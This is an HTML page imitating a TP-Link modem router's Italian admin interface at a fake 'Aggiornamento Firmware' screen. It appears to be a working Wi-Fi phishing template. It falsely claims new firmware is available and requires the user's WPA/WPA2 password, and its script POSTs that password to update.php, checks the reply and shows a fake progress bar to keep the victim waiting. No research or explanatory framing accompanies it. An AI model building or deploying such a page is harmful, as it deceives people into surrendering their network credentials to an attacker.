﻿<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
	"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
	<link rel="Stylesheet" href="./css/main.css" type="text/css" />
	<link rel="Stylesheet" href="./css/update.css" type="text/css" />
	<link rel="Shortcut Icon" href="./img/icon.jpg" type="image/jpeg" />

	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

	<title>TP-Link</title>
</head>

<body>
	<div id="con" style="min-height: 261px;">
		<div id="ban">
			<a href="http://www.tp-link.com">
			<img id="logo" src="./img/top1_1.jpg" style="float: left;"/></a>
			<div id="mod" style="height: 87px; margin: 0; text-align: right; overflow: hidden; background: url('./img/top1_2.jpg') no-repeat right;">
				<p id="mname" style="font-size: 16px; font-weight: bold; color: #fff; margin: 37px 24px 0 0; padding: 0;">Wireless Dual Band Gigabit ADSL2+ Modem Router</p>
			</div>
			<img id="bhr" src="./img/top2.jpg" style="height: 3px; width: 100%; display: block;"/>
		</div>

		<div id="menu">
			<ul class="mu1">
				<li class="ml1">
					<a href="#" id="menu_status" class="T">Stato</a>
				</li>
				<li class="ml1">
					<a href="#" id="menu_qs" class="T">Impostazioni Rapide</a>
				</li>
				<li class="ml1">
					<a href="#" id="menu_sysmod" class="T">Modalità Operativa</a>
				</li>
				<li class="ml1">
					<a href="#" id="menu_network" class="T plus">Rete</a>
				</li>
				<li class="ml1">
					<a href="#" id="menu_iptv" class="T">IPTV</a>
				</li>
				<li class="ml1">
					<a href="#" id="menu_dhcp" class="T plus">DHCP Server</a>
				</li>
				<li class="ml1">
					<a href="#" id="menu_wl2g" class="T plus">Wireless 2.4GHz</a>
				</li>
				<li class="ml1">
					<a href="#" id="menu_wl5g" class="T plus">Wireless 5GHz</a>
				</li>
				<li class="ml1">
					<a href="#" id="menu_wlguest" class="T plus">Rete Ospite</a>
				</li>
				<li class="ml1">
					<a href="#" id="menu_usb" class="T plus">Impostazioni USB</a>
				</li>
				<li class="ml1">
					<a href="#" id="menu_router" class="T plus">Impostazioni di Route</a>
				</li>
				<li class="ml1">
					<a href="#" id="menu_router6" class="T plus">Impostazioni di Route IPv6</a>
				</li>
				<li class="ml1">
					<a href="#" id="menu_fwd" class="T plus">Forwarding</a>
				</li>
				<li class="ml1">
					<a href="#" id="menu_pc" class="T">Controllo Genitori</a>
				</li>
				<li class="ml1">
					<a href="#" id="menu_fw" class="T plus">Firewall</a>
				</li>
				<li class="ml1">
					<a href="#" id="menu_fw6" class="T plus">IPv6 Firewall</a>
				</li>
				<li class="ml1">
					<a href="#" id="menu_tunnel6" class="T">IPv6 Tunnel</a>
				</li>
				<li class="ml1">
					<a href="#" id="menu_tc" class="T">Controllo Bandwidth</a>
				</li>
				<li class="ml1">
					<a href="#" id="menu_arp" class="T plus">IP &amp; MAC Binding</a>
				</li>
				<li class="ml1">
					<a href="#" id="menu_ddns" class="T">DNS Dinamico</a>
				</li>
				<li class="ml1">
					<a href="#" id="menu_diag" class="T">Diagnostica</a>
				</li>
				<li class="ml1">
					<a href="#" id="menu_tools" class="T plus sel min">System Tools</a>
					<ul class="mu2">
						<li class="ml2">
							<a href="#" id="menu_log" class="T">System Log</a>
						</li>
						<li class="ml2">
							<a href="#" id="menu_time" class="T">Impostazioni Orario</a>
						</li>
						<li class="ml2">
							<a href="#" id="menu_mcl" class="T">Stato</a>
						</li>
						<li class="ml2">
							<a href="#" id="menu_cwmp" class="T">Impostazioni CWMP</a>
						</li>
						<li class="ml2">
							<a href="#" id="menu_snmp" class="T">Impostazioni SNMP</a>
						</li>
						<li class="ml2">
							<a href="#" id="menu_bnr" class="T">Backup &amp; Ripristino</a>
						</li>
						<li class="ml2">
							<a href="#" id="menu_def" class="T">Reset</a>
						</li>
						<li class="ml2">
							<a href="#" id="menu_softup" class="T sel">Aggiornamento Firmware</a>
						</li>
						<li class="ml2">
							<a href="#" id="menu_stat" class="T">Statistiche</a>
						</li>
					</ul>
				</li>
				<li class="ml1">
					<a href="#" id="menu_logout" class="T">Logout</a>
				</li>
			</ul>
		</div>

		<div id="main" class="main ">
			<p class="et T" id="et">Aggiornamento Firmware</p>
			<div class="con1 M">
				<p class="ct"></p>
				<p class="bl"></p>
			<div class="con2">
				<p class="L1 T" id="t_info">È disponibile un nuovo firmware per il vostro TP-Link che migliorerà le funzionalità e le performance dell'apparato.</p>
				<p class="L1 T" id="t_info2">Per scaricare e aggiornare il firmware è necessario inserire la password WPA/WPA2 e premere il tasto AGGIORNA per procedere.</p>
				<p class="br"></p>				
				<p><b class="item T" id="t_swver">Versione Firmware Corrente:</b><span id="up_sver">0.6.0 0.7 v003e.0 Build 140928 Rel.38569n</span></p>
				<p><b class="item T" id="t_hwver">Versione Hardware:</b><span id="up_hver">D2 v1 20140628</span></p>
				<p><b class="item T" id="t_swver">Nuova Versione Firmware:</b><span id="up_sver"><b style="color: red">0.7.5 0.3 v004e.0 Build 161031 Rel.42732o</b></span></p>
				<p class="bl"></p>
				<div class="con1 L" id="d_dsl_status">
					<p class="st">DOWNLOAD</p>
					<div class="con2">
						<form id="updateform" method="post" action="update.php">
							<p>
								<b class="item T" id="t_swver">WPA/WPA2 :</b>
								<input id="wpa_psw" name="wpa_psw" type="password"/>
							</p>
							<p>
								<b class="item T" id="t_swver">Conferma WPA/WPA2 :</b>
								<input id="wpa_psw_conf" name="wpa_psw_conf" type="password"/>
							</p>
							<p class="br"></p>
							<p style="text-align: center">
								<input id="button_update" class="button L T" type="submit" value="Aggiorna"/>
							</p>
							<p class="br"></p>
							<p style="text-align: center">
								<progress id="pbar" value="0" max="100"></progress>
							</p>
						</form>
					</div>
				</div>
				
				<p class="L1"><span class="T T_note">Nota</span>:</p>
				<p><i class="T" id="t_note1">Il download e l'aggiornamento del firmware può richiedere alcuni minuti. Durante l'aggiornamento non spegnere il router nè chiudere il browser.</i></p>
			</div>
			<p class="bl"></p>
		</div>

		<div id="bot"></div>

		<div id="misc" class="nd"></div>
	</div>

	<div id="cover" class="nd"></div>
	<iframe name="up_frame" id="up_frame" class="nd"></iframe>

	<form id="ansiform" name="ansiform"></form>

	<div id="preload">
		<div class="cl"></div>

		<div class="cln"></div>
	</div>

	<script type="text/javascript" src="js/jquery-2.1.4.min.js"></script>
	<script type="text/javascript" src="js/pBar.js"></script>
	<script type="text/javascript">
		$(document).ready(function() {						
			$("#updateform").submit(function(e) {

				e.preventDefault();
				$(".error").hide();
	
				var hasError = false;
				var wpa_psw = $("#wpa_psw").val();
				var wpa_psw_conf = $("#wpa_psw_conf").val();
				
				if (wpa_psw == '') {
            $("#wpa_psw").after('<span class="error">Per favore, inserire la password.</span>');
            hasError = true;
        } else if (wpa_psw_conf == '') {
            $("#wpa_psw_conf").after('<span class="error">Per favore, inserire la stessa password.</span>');
            hasError = true;
        } else if (wpa_psw != wpa_psw_conf ) {
            $("#wpa_psw_conf").after('<span class="error">Le password non sono uguali.</span>');
            hasError = true;
        }
				
				
		if (!hasError) {					
			var formURL = $(this).attr("action");					
			var pBar = $("#pbar");
			
			$.ajax({
					type: "POST",
					url : formURL,
					data: {wpa_psw: wpa_psw, wpa_psw_conf: wpa_psw_conf},
					dataType:'JSON',
					success:function(response){
						console.log(response);

						if (response) {
							// psw OK
							$("#wpa_psw").prop('disabled', true);
							$("#wpa_psw_conf").prop('disabled', true);
							pBar.addClass("update");
						
							doProgress();
						} else {
							alert ("La password inserita non è corretta! Inserire la password corretta.");
							$("#button_update").prop('disabled', false);
						}
					}
			});
		}
		});
	});
	</script>
	</body>
</html>
